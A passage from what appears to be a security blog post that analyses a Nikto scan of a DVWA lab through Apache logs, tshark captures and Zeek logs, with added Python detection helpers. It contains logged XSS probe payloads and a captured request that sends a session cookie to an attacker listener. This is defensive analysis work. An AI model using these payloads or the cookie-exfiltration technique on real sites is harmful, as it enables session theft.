<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%206aNVKEwARt/../../dvwa/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20j7vq9Hi1xXNr4X/../../dvwa/index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.1"</span>
</pre></div>
</div><div><br /></div><p>A status code of <i>200</i> for those entries is surprising at first, since the source of "<i>index.php</i>" does not reference any of those parameters, i.e. "<i>option</i>", "<i>file</i>", "<i>dir</i>", etc.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ curl --request GET "http://10.0.0.106/dvwa/index.php" --silent | grep --perl-regexp --ignore-case 'type="text".*("action"|"searchFor"|"username"|"dir"|"err"|"file"|"op"|"rep"|"vo"|"GLOBALS[test]"|"VARIABLE")' | wc --lines </span>
<span style="color: white;">0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>To confirm, I requested the page directly with a parameter that does not exist and still got status <i>200</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ curl --request GET http://10.0.0.106//dvwa/index.php?</span><span style="color: #fcff01;">NonExistentShit=FalseFlags</span><span style="color: white;"> --remote-name --silent</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>This produced:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.107 - - [05/Jun/2023:14:09:44 -0400] "GET //dvwa/index.php?</span><span style="color: #fcff01;">NonExistentShit=FalseFlags</span><span style="color: white;"> HTTP/1.1" </span><span style="color: #fcff01;">200</span><span style="color: white;"> 5960 "-" "curl/7.88.1"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So the <i>200</i> belongs to the page, not to the parameter: PHP ignores query parameters the script never reads, and a <i>200</i> on its own says nothing about whether the payload was reflected into the response.</p><p>Peeking at the first few lines of the <i>error.log</i> file that mention "<i>script</i>", to see which attempts to run a script were logged.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" | head --lines=5 </span>
<span style="color: white;">[Fri Jun 02 13:37:21.898886 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55840] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/cgi.cgi</span>
<span style="color: white;">[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/junk999.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.522563 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/login.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.637381 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:47494] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.cgi</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Above shows "<i>script not found or unable to stat</i>" for each CGI-style path Nikto probed. How many distinct paths did it try?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --only-matching | sort --unique | cut --fields=2 --delimiter='C' | cut --fields=1 --delimiter="'" | cut --fields=1 --delimiter=',' | sort --unique | wc --lines</span>
<span style="color: white;">93</span>
</pre></div>
</div><div><br /></div><div>With 93 distinct paths requested, was any of them found? Invert the "<i>grep</i>" to see what else the error log recorded for this client.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --invert-match | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp "Cannot\s+map|\s+GET"</span>
<span style="color: white;">[Fri Jun 02 13:37:24.113277 2023] [core:error] [pid 7548:tid 1864] (20024)The given path is misformatted or contained invalid characters: [client 10.0.0.108:47510] AH00127: Cannot map GET /%20HTTP/1.1%0d%0aAccept%3a%20RIxToXpAUn2JvPd87/../../dvwa/666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1 to file</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Removing those "<i>Cannot map</i>" messages as well, what is left is PHP warnings.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --invert-match | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp "Cannot\s+map|\s+GET" --invert-match </span>
<span style="color: white;">[Fri Jun 02 13:37:23.522563 2023] [php:warn] [pid 7548:tid 1864] [client 10.0.0.108:55874] PHP Warning: Undefined array key "HTTP_HOST" in C:\\xampp\\htdocs\\dvwa\\dvwa\\includes\\dvwaPage.inc.php on line 45</span>
<span style="color: white;">...</span>
</pre></div>
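<p>The <i>error.log</i> entries above are only failed CGI lookups and PHP warnings; they cannot tell us whether a payload was reflected. Added example, not from the original post: a check that takes the request target and the response body and reports, per parameter, whether the probe came back raw, HTML-encoded, or not at all. The three response bodies are constructed stand-ins for what <i>index.php</i> could return, not captured output; in practice you would feed it the body from TShark's <i>follow</i> output or from <i>curl</i>.</p>

```python
"""Tell a reflected probe apart from a page that merely answered 200.

Added example, not from the original post. The response bodies are constructed
stand-ins for what DVWA's index.php could return; they are not captured output.
"""
import html
from urllib.parse import parse_qsl

# One of the Nikto probes seen in the access.log above.
PROBE = "/dvwa/index.php?dir=<script>alert('Vulnerable')</script>"

# Constructed bodies: the parameter ignored, echoed HTML-encoded, and echoed raw.
BODY_IGNORED = "<html><body><h1>DVWA</h1><p>Welcome</p></body></html>"
BODY_ESCAPED = ("<html><body><p>dir: &lt;script&gt;alert(&#039;Vulnerable&#039;)"
                "&lt;/script&gt;</p></body></html>")
BODY_RAW = "<html><body><p>dir: <script>alert('Vulnerable')</script></p></body></html>"


def encoded_forms(value):
    """The ways a server-side encoder commonly renders VALUE: Python's html.escape
    (&#x27; for a single quote) and PHP htmlspecialchars with ENT_QUOTES (&#039;)."""
    basic = html.escape(value, quote=False)
    return {
        html.escape(value, quote=True),
        basic,
        basic.replace('"', '&quot;').replace("'", '&#039;'),
    }


def classify_reflection(request_target, body):
    """Map each query parameter of REQUEST_TARGET to 'raw', 'escaped' or 'absent'
    depending on how its value appears in BODY."""
    _, _, query = request_target.partition('?')
    verdict = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not value:
            continue
        if value in body:
            verdict[name] = 'raw'
        elif any(form in body for form in encoded_forms(value)):
            verdict[name] = 'escaped'
        else:
            verdict[name] = 'absent'
    return verdict


def looks_exploitable(verdict):
    """A 200 is only interesting when at least one value came back unencoded."""
    return any(v == 'raw' for v in verdict.values())


if __name__ == '__main__':
    for label, body in (('ignored', BODY_IGNORED), ('escaped', BODY_ESCAPED), ('raw', BODY_RAW)):
        v = classify_reflection(PROBE, body)
        print(label, v, 'exploitable' if looks_exploitable(v) else 'not exploitable')
```

<p>Only the "<i>raw</i>" outcome turns a <i>200</i> into a finding; the "<i>absent</i>" outcome is what the <i>NonExistentShit=FalseFlags</i> test above demonstrates, a page that answers <i>200</i> to anything and reads none of it.</p>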
</div><div><br /></div><div><div>At this point, nothing in the <i>error.log</i> suggests this attack was successful. The many "<i><script>alert('Vulnerable')</script></i>" payloads are reason enough to be concerned about the source IP involved in this activity, but a reflected cross site scripting attack succeeds in a victim's browser, not on the server: the server logs record the request and a <i>200</i> either way. Confirming it takes the response body (was the payload echoed back unescaped?) or a client-side artifact, and we have to work with the evidence we currently have and not what we want.</div><div><br /></div><div>For more on log analysis for cross site scripting: <a href="https://www.securitynik.com/2017/02/beginning-web-application-testing.html">Learning by practicing: Beginning Web Application Testing: Detecting Cross Site Scripting (XSS)–DVWA (securitynik.com)</a></div></div><div><br /></div><div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div></div><div><br /></div><div><div>Setup for packet analysis. Capture packets on ports 80 and 443.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -w tuning_4.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
</div><div><br /></div><div>What did we get from the capture? Which TCP streams carry a <i>200</i> response?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -r tuning_4.pcap -Y 'http.response.code == 200' -T fields -e tcp.stream| sort --unique </span>
<span style="color: white;">0</span>
<span style="color: white;">10</span>
<span style="color: white;">11</span>
<span style="color: white;">12</span>
<span style="color: white;">13</span>
<span style="color: white;">4</span>
<span style="color: white;">5</span>
<span style="color: white;">6</span>
<span style="color: white;">7</span>
<span style="color: white;">8</span>
<span style="color: white;">9</span>
</pre></div>
</div><div><br /></div><div>Following one of those streams (stream <i>4</i> in the query below) and looking around the <i>200 OK</i> did not produce any results I found meaningful.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -r tuning_4.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|\s+OK" --before-context=7 --after-context=11</span>
</pre></div>
</div><div><br /></div><div>This stream did not produce the results I expected, so I set up a separate test to see what cookie theft via cross site scripting actually looks like on the wire: a payload that sends the victim browser's <i>document.cookie</i> to a listener under the attacker's control. In that capture (<i>xss.pcap</i>) the cookie leaves in the query string of a <i>GET</i> request to <i>10.0.0.107:9999</i>, with the <i>Referer</i> still pointing back at the DVWA host.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span><span style="color: white;">
</span><span style="color: white;">└─$ tshark -n -r xss.pcap -q -z follow,tcp,ascii,1 | sed '1,7d' | sed '$d' </span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">GET</span><span style="color: white;"> </span><span><span style="color: white;">/steal.txt?</span><span style="color: #fcff01;">security=low;%20PHPSESSID=c9nho1bvu73dg6baehjo2vjgcn</span></span><span style="color: white;"> </span><span style="color: white; font-weight: bold;">HTTP</span><span style="color: white;">/</span><span style="color: white; font-weight: bold;">1.1</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Host</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">10.0.0.107:9999</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Connection</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">keep-alive</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Upgrade-Insecure-Requests</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">1</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">User-Agent</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Referer</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">http://10.0.0.106/</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept-Encoding</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">gzip, deflate</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept-Language</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">en-US,en;q=0.9</span></span>
</pre></div>
</div><div><br /></div><div>Wrapping this up: the cookies Nikto reported as "<i>sent cookie</i>" were not stolen cookies. They are the <i>Set-Cookie</i> headers the server returned to Nikto's own requests, i.e. the scanner's own session, as the capture shows.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span>└─$ strings tuning_4.pcap | grep "3a%209dezoCMqi7" --after-context=10</span>
<span style="font-weight: bold;">GET</span> <span>/%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span>HTTP/1.1</span> <span>200 OK</span>
<span style="font-weight: bold;">Date</span><span>:</span> <span>Fri, 02 Jun 2023 17:37:21 GMT</span>
<span style="font-weight: bold;">Server</span><span>:</span> <span>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="font-weight: bold;">X-Powered-By</span><span>:</span> <span>PHP/8.0.28</span>
<span style="font-weight: bold;">Set-Cookie</span><span>:</span> <span>security=low; path=/</span>
<span style="font-weight: bold;">Set-Cookie</span><span>:</span> <span>PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="font-weight: bold;">Expires</span><span>:</span> <span>Tue, 23 Jun 2009 12:00:00 GMT</span></span>
</pre></div>
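<p>Two things look alike in a capture but mean the opposite: a session cookie arriving in a <i>Set-Cookie</i> response header (the server handing the scanner its own session, which is what Nikto's "<i>sent cookie</i>" lines are) and a session cookie leaving in the query string of a request to some other host (the <i>xss.pcap</i> stream above). Added example, not part of the original post, that tells the two apart. The request and response texts are constructed from the exchanges shown in this section (listener, paths and cookie values as displayed, with the remaining headers trimmed), and the list of cookie names to watch for is an assumption.</p>

```python
"""Session cookie in a Set-Cookie response vs session cookie in an outbound URL.

Added example, not part of the original post. The three messages are constructed
from the exchanges shown in this section; the set of cookie names to watch is an
assumption.
"""
import re
from urllib.parse import unquote, urlsplit

# Names that identify a session when they show up in a URL (assumed list).
SESSION_COOKIE_NAMES = {'phpsessid', 'jsessionid', 'asp.net_sessionid', 'security',
                        'session', 'sessionid', 'sid', 'token'}

# Modelled on the xss.pcap stream: the victim browser fetching an attacker URL.
EXFIL_REQUEST = (
    "GET /steal.txt?security=low;%20PHPSESSID=c9nho1bvu73dg6baehjo2vjgcn HTTP/1.1\r\n"
    "Host: 10.0.0.107:9999\r\n"
    "Referer: http://10.0.0.106/\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

# An ordinary request to DVWA carrying its cookies where they belong.
BENIGN_REQUEST = (
    "GET /dvwa/index.php HTTP/1.1\r\n"
    "Host: 10.0.0.106\r\n"
    "Cookie: security=low; PHPSESSID=c9nho1bvu73dg6baehjo2vjgcn\r\n"
    "\r\n"
)

# Modelled on the server's answer to Nikto's own request, i.e. a "sent cookie" line.
NIKTO_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: security=low; path=/\r\n"
    "Set-Cookie: PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/\r\n"
    "\r\n"
)


def parse_message(text):
    """Split an HTTP message into (start line, [(lowercased name, value), ...], body)."""
    head, _, body = text.partition('\r\n\r\n')
    start, *lines = head.split('\r\n')
    headers = []
    for line in lines:
        name, sep, value = line.partition(':')
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return start, headers, body


def first_header(headers, name):
    return next((v for n, v in headers if n == name), '')


def session_pairs_in_query(target):
    """Cookie-shaped name=value pairs in the query, including a whole Cookie header
    value pasted in as one parameter (name=value; name=value)."""
    _, _, query = target.partition('?')
    found = {}
    for chunk in re.split(r'[&;]', unquote(query)):
        name, sep, value = chunk.strip().partition('=')
        if sep and value and name.strip().lower() in SESSION_COOKIE_NAMES:
            found[name.strip()] = value.strip()
    return found


def assess_request(text):
    """'cookie-exfil' when a session value travels in the URL to a host other than
    the page that referred it, 'cookie-in-url' when the host matches, else 'clean'."""
    start, headers, _ = parse_message(text)
    _, _, rest = start.partition(' ')
    target, _, _ = rest.rpartition(' ')
    leaked = session_pairs_in_query(target)
    if not leaked:
        return {'verdict': 'clean', 'leaked': {}}
    host = first_header(headers, 'host').split(':')[0]
    referer_host = urlsplit(first_header(headers, 'referer')).hostname or ''
    cross_site = bool(referer_host) and referer_host != host
    return {'verdict': 'cookie-exfil' if cross_site else 'cookie-in-url',
            'leaked': leaked, 'to': host, 'from': referer_host}


def assess_response(text):
    """Set-Cookie names the server issued to whoever sent the request; on its own it
    is the server talking to the scanner, not a stolen cookie."""
    _, headers, _ = parse_message(text)
    names = [v.split('=', 1)[0].strip() for n, v in headers if n == 'set-cookie']
    return {'kind': 'server-issued', 'cookies': names}


if __name__ == '__main__':
    print(assess_request(EXFIL_REQUEST))
    print(assess_request(BENIGN_REQUEST))
    print(assess_response(NIKTO_RESPONSE))
```

<p>Only the request-side verdict is evidence of theft; the response-side <i>Set-Cookie</i> is the same thing Nikto prints as "<i>sent cookie</i>". Feeding the parsed request text from <i>tshark -z follow,tcp,ascii,N</i> into <i>assess_request</i> is enough to pick the <i>steal.txt</i> stream out of a capture.</p>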
</div><div><br /></div><div><div>Moving on now.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div></div><div><br /></div><div>Setup Zeek to capture live on all interfaces, ignoring bad checksums (with NIC checksum offloading the captured packets often carry checksums that were never computed, and Zeek would otherwise discard them):<br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Looking at the <i>analyzer.log</i> file</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat analyzer.log </span>
<span style="color: white;">...</span>
<span style="color: white;">#open 2023-06-02-13-37-45</span>
<span style="color: white;">#fields ts cause analyzer_kind analyzer_name uid fuid id.orig_h id.orig_p id.resp_h id.resp_p failure_reason failure_data</span>
<span style="color: white;">#types time string string string string string addr port addr port string string</span>
<span style="color: white;">1685727465.687074 violation protocol HTTP CvBOhB3P4vU8YucCt6 - 10.0.0.108 47542 10.0.0.106 80 not a http request line -</span>
<span style="color: white;">#close 2023-06-02-13-37-53</span>
</pre></div>
</div><div><br /></div><div><div>Above shows traffic between two hosts on port 80, normally HTTP, but the "<i>failure_reason</i>" is "<i>not a http request line</i>". A <i>violation</i> in this log means Zeek's HTTP analyzer gave up on the connection because what the client sent did not parse as an HTTP request line.</div><div><br /></div><div>Looking at UID "<i>CvBOhB3P4vU8YucCt6</i>" to find which other logs this UID is seen in. The UID is the key Zeek uses to tie one connection's entries together across all of its logs, so it is the natural pivot.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "CvBOhB3P4vU8YucCt6" *.log | cut --fields=1 --delimiter=":" | sort --unique </span>
<span style="color: white;">analyzer.log</span>
<span style="color: white;">conn.log</span>
<span style="color: white;">dpd.log</span>
<span style="color: white;">files.log</span>
<span style="color: white;">http.log</span>
<span style="color: white;">weird.log</span>
</pre></div>
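<p>The pivot above, done with <i>grep</i>, is worth having as a script that understands the log format. The following is an added Python example, not code from this post or from Zeek: it reads Zeek's tab-separated logs by their <i>#fields</i> header, collects every row carrying a given UID, and summarises where the UID appears, what Zeek flagged as weird, and which URIs carried a script tag. The embedded <i>analyzer.log</i> and <i>weird.log</i> rows are the ones shown in this post; the <i>http.log</i> rows are constructed, trimmed to a few columns, and their status codes are assumed.</p>

```python
"""Pivot on a Zeek connection UID across several Zeek logs.

Added example. The TSV samples below are constructed from entries shown in
this post (analyzer.log, weird.log) plus an http.log trimmed to a few columns.
"""
from typing import Dict, List


def parse_zeek_tsv(text: str) -> List[Dict[str, str]]:
    """Parse Zeek's ASCII log format into a list of {field: value} rows.

    Zeek logs are tab separated and self-describing: the '#fields' header
    names the columns; the other '#' lines (#separator, #types, #open,
    #close, #path) carry metadata and are skipped. Reading the header instead
    of hard-coding column numbers keeps this correct when a log has extra or
    reordered fields.
    """
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#fields\t"):
                fields = line.split("\t")[1:]
            continue
        if fields is None:
            raise ValueError("data row seen before the #fields header")
        rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def pivot_uid(logs: Dict[str, str], uid: str) -> Dict[str, List[Dict[str, str]]]:
    """Return {log name: matching rows} for every log that mentions the UID."""
    hits = {}
    for name, text in logs.items():
        rows = [r for r in parse_zeek_tsv(text) if r.get("uid") == uid]
        if rows:
            hits[name] = rows
    return hits


def summarize(hits: Dict[str, List[Dict[str, str]]]) -> Dict[str, list]:
    """Collapse the pivot into what an analyst wants first: where the UID
    appears, what Zeek flagged as weird, and any URIs carrying a script tag."""
    return {
        "logs": sorted(hits),
        "weird": sorted({r["name"] for r in hits.get("weird.log", [])}),
        "script_uris": [
            r["uri"] for r in hits.get("http.log", [])
            if "<script" in r["uri"].lower()
        ],
    }


def tsv(*rows):
    """Join tab-separated rows into one log body (helper for the samples)."""
    return "\n".join("\t".join(r) for r in rows) + "\n"


# Constructed samples. The analyzer.log and weird.log rows are the ones seen in
# this post; the http.log rows are trimmed to a handful of fields and their
# status codes are assumed.
ANALYZER_LOG = tsv(
    ("#fields", "ts", "cause", "analyzer_kind", "analyzer_name", "uid", "fuid",
     "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "failure_reason", "failure_data"),
    ("1685727465.687074", "violation", "protocol", "HTTP", "CvBOhB3P4vU8YucCt6", "-",
     "10.0.0.108", "47542", "10.0.0.106", "80", "not a http request line", "-"),
)
WEIRD_LOG = tsv(
    ("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
     "name", "addl", "notice", "peer", "source"),
    ("1685727464.659445", "CcdKGV3GMXMm4z9kI4", "10.0.0.108", "47504", "10.0.0.106", "80",
     "unknown_HTTP_method", "TRACK", "F", "zeek", "-"),
    ("1685727465.687074", "CvBOhB3P4vU8YucCt6", "10.0.0.108", "47542", "10.0.0.106", "80",
     "bad_HTTP_request_with_version", "-", "F", "zeek", "HTTP"),
)
HTTP_LOG = tsv(
    ("#fields", "ts", "uid", "id.orig_h", "id.resp_h", "method", "uri", "status_code"),
    ("1685727464.659445", "CcdKGV3GMXMm4z9kI4", "10.0.0.108", "10.0.0.106", "TRACK", "/dvwa/", "405"),
    ("1685727465.687074", "CvBOhB3P4vU8YucCt6", "10.0.0.108", "10.0.0.106", "GET",
     "/dvwa/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>", "404"),
    ("1685727465.687074", "CvBOhB3P4vU8YucCt6", "10.0.0.108", "10.0.0.106", "GET",
     "/dvwa/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>", "404"),
)
SAMPLE_LOGS = {"analyzer.log": ANALYZER_LOG, "weird.log": WEIRD_LOG, "http.log": HTTP_LOG}

if __name__ == "__main__":
    for key, value in summarize(pivot_uid(SAMPLE_LOGS, "CvBOhB3P4vU8YucCt6")).items():
        print(f"{key}: {value}")
```

<p>Pointed at a real Zeek log directory, the same parser takes the full <i>conn.log</i>, <i>files.log</i> and <i>dpd.log</i> too, since only the <i>#fields</i> header is needed; <i>zeek-cut</i> covers the single-log case, but it does not join across logs for you.</p>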
</div><div><br /></div><div><div>Looking at the <i>weird.log</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat weird.log </span>
<span style="color: white;">#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p name addl notice peer source</span>
<span style="color: white;">1685727464.327551 CdCvW413cTsQUyb9lf 10.0.0.108 55874 10.0.0.106 80 HTTP_version_mismatch - F zeek HTTP</span>
<span style="color: white;">1685727464.641628 CZCM3y1MlJGfr3DZ27 10.0.0.108 47496 10.0.0.106 80 unknown_HTTP_method XULKCYAP F zeek -</span>
